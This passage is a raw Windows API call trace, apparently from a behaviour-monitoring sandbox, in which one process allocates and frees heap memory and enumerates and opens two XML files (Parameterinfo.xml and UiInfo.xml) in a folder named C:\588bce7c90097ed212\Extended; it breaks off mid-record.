[0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0061.930] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78110 [0061.930] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.930] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0061.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0061.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.931] AreFileApisANSI () returned 1 [0061.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", lpUsedDefaultChar=0x0) returned 49 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.931] AreFileApisANSI () returned 1 [0061.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0061.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x45f68 [0061.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x45f68, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0061.932] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.932] GetFileType (hFile=0x41c) returned 0x1 [0061.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0061.932] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.932] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.932] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.932] CloseHandle (hObject=0x41c) returned 1 [0061.933] AreFileApisANSI () returned 1 [0061.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x469e8 [0061.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x469e8, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0061.933] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.933] GetFileType (hFile=0x41c) returned 0x1 [0061.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0061.933] CloseHandle (hObject=0x41c) returned 1 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.934] AreFileApisANSI () returned 1 [0061.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46748 [0061.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=49 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 49 [0061.934] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82)) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.934] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0061.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.935] AreFileApisANSI () returned 1 [0061.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", lpUsedDefaultChar=0x0) returned 42 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.935] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0061.935] AreFileApisANSI () returned 1 [0061.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0061.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67540 [0061.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0061.936] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.936] GetFileType (hFile=0x41c) returned 0x1 [0061.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0061.936] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.936] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.936] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.936] CloseHandle (hObject=0x41c) returned 1 [0061.937] AreFileApisANSI () returned 1 [0061.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67900 [0061.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0061.937] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.937] GetFileType (hFile=0x41c) returned 0x1 [0061.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0061.937] CloseHandle (hObject=0x41c) returned 1 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.938] 